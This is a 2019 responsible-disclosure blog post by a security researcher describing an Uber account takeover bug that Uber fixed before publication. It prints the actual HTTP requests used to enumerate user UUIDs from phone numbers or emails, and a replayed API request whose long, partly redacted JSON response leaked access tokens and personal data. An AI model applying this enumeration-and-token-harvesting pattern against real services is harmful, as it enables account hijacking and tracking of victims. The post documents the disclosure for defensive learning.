Navigate back to the homepage

How I could have hacked your Uber account

Anand Prakash
September 12th, 2019 · 2 min read

This is being published with the permission of Uber under the responsible disclosure policy. The vulnerability detailed in this blog post is being disclosed by Anand Prakash of AppSecure. This was plugged quickly by the security team at Uber.

This issue is similar to Facebook’s access token leak which was discovered last year https://techcrunch.com/2018/09/28/facebook-says-50-million-accounts-affected-by-account-takeover-bug/

About Uber

Uber is a transportation network company (TNC) headquartered in San Francisco, California. Uber offers services including peer-to-peer ridesharing, taxi cab hailing, food delivery, and a bicycle-sharing system. The company has operations in 785 metropolitan areas worldwide. Uber has a valuation of over $100 billion as per Bloomberg’s report.

Description

This post is about an account takeover vulnerability on Uber which allowed attackers to take over any other user’s Uber account (including riders, partners, eats) account by supplying user UUID in the API request and using the leaked token in the API response to hijack accounts. We were able to enumerate any other Uber’s user UUID by supplying their phone number or email address in another API request.

It allowed an attacker to track the victim’s location, take rides from their account, etc. by compromising the account using the leaked access token of Uber mobile application. This also permitted takeover of Uber driver, Eats accounts

How my exploit worked step-by-step

Step #1 Getting user UUID of any Uber User

Below APIs leaked any Uber user’s (Partner, Rider, Ubereats user) UUID if supplied with their phone number or email address

API #1

1POST /p3/fleet-manager/\_rpc?rpc=addDriverV2 HTTP/1.1
2Host: partners.uber.com
3{“nationalPhoneNumber”:”99999xxxxx”,”countryCode”:”1"}

Response:

1{
2 “status”:”failure”,
3 ”data”: {
4 “code”:1009,
5 ”message”:”Driver ‘47d063f8–0xx5e-xxxxx-b01a-xxxx’ not found”
6 }
7}

‘47d063f8–0xx5e-4eb4-xxx-xxxxxxx’ is leaked Uber UUID of Uber user having phone number 99999xxxxx

API #2

1POST /p3/fleet-manager/\_rpc?rpc=addDriverV2 HTTP/1.1
2Host: partners.uber.com
3{“email”:”[email protected]”}

Response leaks UUID:

1{
2 “status”:”failure”,
3 ”data”: {
4 “code”:1009,
5 ”message”:”Driver ‘ca111b95–1111–4396-b907–83abxxx5f7371e’ not found”
6 }
7}

‘Ca111b95–1111–4396-b907–83abxxx5f7371e’ is leaked Uber UUID of Uber user having email address [email protected]

Step #2

Once you have the leaked Uber UUID from the above request for any user. Then you can replay below request using victim’s Uber UUID to get access to their private information like access token (mobile apps), location, address, etc. Access token allowed me to take over victim’s account completely. We were able to see rides, request rides, see payment information, etc. of our test accounts using the leaked token.

The vulnerable Uber API:

1POST /marketplace/\_rpc?rpc=getConsentScreenDetails HTTP/1.1
2Host: bonjour.uber.com
3Connection: close
4Content-Length: 67
5Accept: application/json
6Origin: [https://bonjour.uber.com](https://bonjour.uber.com)
7x-csrf-token: xxxx
8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
9DNT: 1
10Content-Type: application/json
11Accept-Encoding: gzip, deflate
12Accept-Language: en-US,en;q=0.9
13Cookie: xxxxx
14{“language”:”en”,”userUuid”:”xxxx–776–4xxxx1bd-861a-837xxx604ce”}

Response leaked entire data of other user including mobile apps access token:

1{
2 “status”:”success”,
3 ”data”:{
4 “data”:{
5 “language”:”en”,
6 ”userUuid”:”xxxxxx1e”
7 },
8 ”getUser”:{
9 “uuid”:”cxxxxxc5f7371e”,
10 ”firstname”:”Maxxxx”,
11 ”lastname”:”XXXX”,
12 ”role”:”PARTNER”,
13 ”languageId”:1,
14 ”countryId”:77,
15 ”mobile”:null,
16 ”mobileToken”:1234,
17 ”mobileCountryId”:77,
18 ”mobileCountryCode”:”+91",
19 ”hasAmbiguousMobileCountry”:false,
20 ”lastConfirmedMobileCountryId”:77,
21 ”email”:[email protected],
22 ”emailToken”:”xxxxxxxx”,
23 ”hasConfirmedMobile”:”no”,
24 ”hasOptedInSmsMarketing”:false,
25 ”hasConfirmedEmail”:true,
26 ”gratuity”:0.3,
27 ”nickname”:[email protected],
28 ”location”:00000",
29 ”banned”:false,
30 ”cardio”:false,
31 ”token”:”b8038ec4143bb4xxxxxx72d”,
32 ”fraudScore”:0,
33 ”inviterUuid”:null,
34 ”pictureUrl”:”xxxxx.jpeg”,
35 ”recentFareSplitterUuids”:[
36 “xxx”
37 ],
38 ”lastSelectedPaymentProfileUuid”:”xxxxxx”,
39 ”lastSelectedPaymentProfileGoogleWalletUuid”:null,
40 ”inviteCode”:{
41 “promotionCodeId”:xxxxx,
42 ”promotionCodeUuid”:”xxxx”,
43 ”promotionCode”:”manishas105",
44 ”createdAt”:{
45 “type”:”Buffer”,
46 ”data”:[0,0,1,76,2,21,215,101]
47 },
48 ”updatedAt”:{
49 “type”:”Buffer”,
50 ”data”:[0,0,1,76,65,211,61,9]
51 }
52 },
53 ”driverInfo”:{
54 “contactinfo”:999999999xx”,
55 ”contactinfoCountryCode”:”+91",
56 ”driverLicense”:”None”,
57 ”firstDriverTripUuid”:null,
58 ”iphone”:null,
59 ”partnerUserUuid”:”xxxxxxx”,
60 ”receiveSms”:true,
61 ”twilioNumber”:null,
62 ”twilioNumberFormatted”:null,
63 ”cityknowledgeScore”:0,
64 ”createdAt”:{
65 “type”:”Buffer”,
66 ”data”:[0,0,1,84,21,124,80,52]
67 },
68 ”updatedAt”:{
69 “type”:”Buffer”,
70 ”data”:[0,0,1,86,152,77,41,77]
71 },
72 ”deletedAt”:null,
73 ”driverStatus”:”APPLIED”,
74 ”driverFlowType”:”UBERX”,
75 ”statusLocks”:null,
76 ”contactinfoCountryIso2Code”:”KR”,
77 ”driverEngagement”:null,
78 ”courierEngagement”:null
79 },
80 ”partnerInfo”:{
81 “address”:”Nxxxxxxx”,
82 ”territoryUuid”:”xxxxxx”,
83 ”company”:”None”,
84 ”address2":”None”,
85 ”cityId”:130,
86 ”cityName”:”None”,
87 ”firstPartnerTripUuid”:null,
88 ”preferredCollectionPaymentProfileUuid”:null,
89 ”phone”:””,
90 ”phoneCountryCode”:”+91",
91 ”state”:”None”,
92 ”vatNumber”:”None”,
93 ”zipcode”:”None”,
94 ”createdAt”:{
95 “type”:”Buffer”,
96 ”data”:[0,0,1,84,21,124,80,52]
97 },
98 ”updatedAt”:{
99 “type”:”Buffer”,
100 ”data”:[0,0,1,101,38,177,88,137
101 ]
102 },
103 ”deletedAt”:null,
104 ”fleetTypes”:[
105
106 ],
107 ”fleetServices”:[
108
109 ],
110 ”isFleet”:true
111 },
112 ”analytics”:{
113 “signupLat”:133.28741199,
114 ”signupLng”:11177.1111,
115 ”signupTerritoryUuid”:”xxxxx”,
116 ”signupPromoId”:null,
117 ”signupForm”:”iphone”,
118 ”signupSessionId”:”xxxxxxx”,
119 ”signupAppVersion”:2.64.1",
120 ”signupAttributionMethod”:null,
121 ”createdAt”:{
122 “type”:”Buffer”,
123 ”data”:[0,0,1,76,2,21,219,1]
124 },
125 ”updatedAt”:{
126 “type”:”Buffer”,
127 ”data”:[0,0,1,76,2,21,219,1
128 ]
129 },
130 ”signupCityId”:130,
131 ”signupDeviceId”:null,
132 ”signupReferralId”:null,
133 ”signupPromoCode”:null,
134 ”signupPromoCodeUuid”:null,
135 ”signupPromoUuid”:null,
136 ”signupMethod”:”REGULAR”
137 },
138 ”createdAt”:{
139 “type”:”Buffer”,
140 ”data”:[0,0,1,76,2,21,215,153]
141 },
142 ”updatedAt”:{
143 “type”:”Buffer”,
144 ”data”:[0,0,1,102,81,35,153,135]
145 },
146 ”deletedAt”:null,
147 ”tenancy”:”uber/production”,
148 ”mobileConfirmationStatus”:”MOBILE_NOT_CONFIRMED”,
149 ”nationalId”:null,
150 ”nationalIdType”:null,
151 ”merchantLocation”:null,
152 ”lastConfirmedMobile”:”xxxxxxxxxx”,
153 ”requestedDeletionAt”:null,
154 ”dateOfBirth”:xxxxxx,
155 ”userTypes”:null,
156 ”preferredName”:”xxxxxxxx”,
157 ”freightInfo”:null,
158 ”tempPictureUrl”:null,
159 ”identityVerified”:null,
160 ”paymentEntityType”:null,
161 ”riderEngagement”:null,
162 ”identityRejectReasonUuid”:null,
163 ”genderInferred”:null,
164 ”genderIdentity”:null,
165 ”genderDocumented”:null,
166 ”riderIneligibleWdw”:null,
167 ”defaultPaymentProfileByProduct”:null,
168 ”loginEligibility”:null
169 },
170 ”getDisclosureVersionUuid”:””,
171 ”getLocaleCopy”:null
172 }
173}

Uber fixed the issue by authorizing the request with current user session and removing sensitive information like access token from the response.

Video Proof of Concept:

Disclosure Timeline

  • April 19, 2019 — Reported to Uber
  • April 25, 2019 — Report Triaged
  • April 26, 2019 — Vulnerability fixed, the bounty of $6500 USD awarded.
  • June 28th, 2019 — Requested for disclosure
  • September 9, 2019 — Report disclosed by Uber

Thanks for reading.

More articles from AppSecure

Security Checklist for Web Developers

A list of best practices for developers to follow to secure their applications.

September 9th, 2019 · 4 min read

How we hacked Tinder accounts using Facebook’s Account Kit and earned $6,250 in bounties

The vulnerabilities mentioned in this blog post were plugged quickly by the engineering teams of Facebook and Tinder.

February 20th, 2018 · 2 min read
© 2019 AppSecure
Link to $https://twitter.com/appsecureLink to $https://github.com/AppSecureIndiaLink to $https://www.linkedin.com/company/appsecure-india/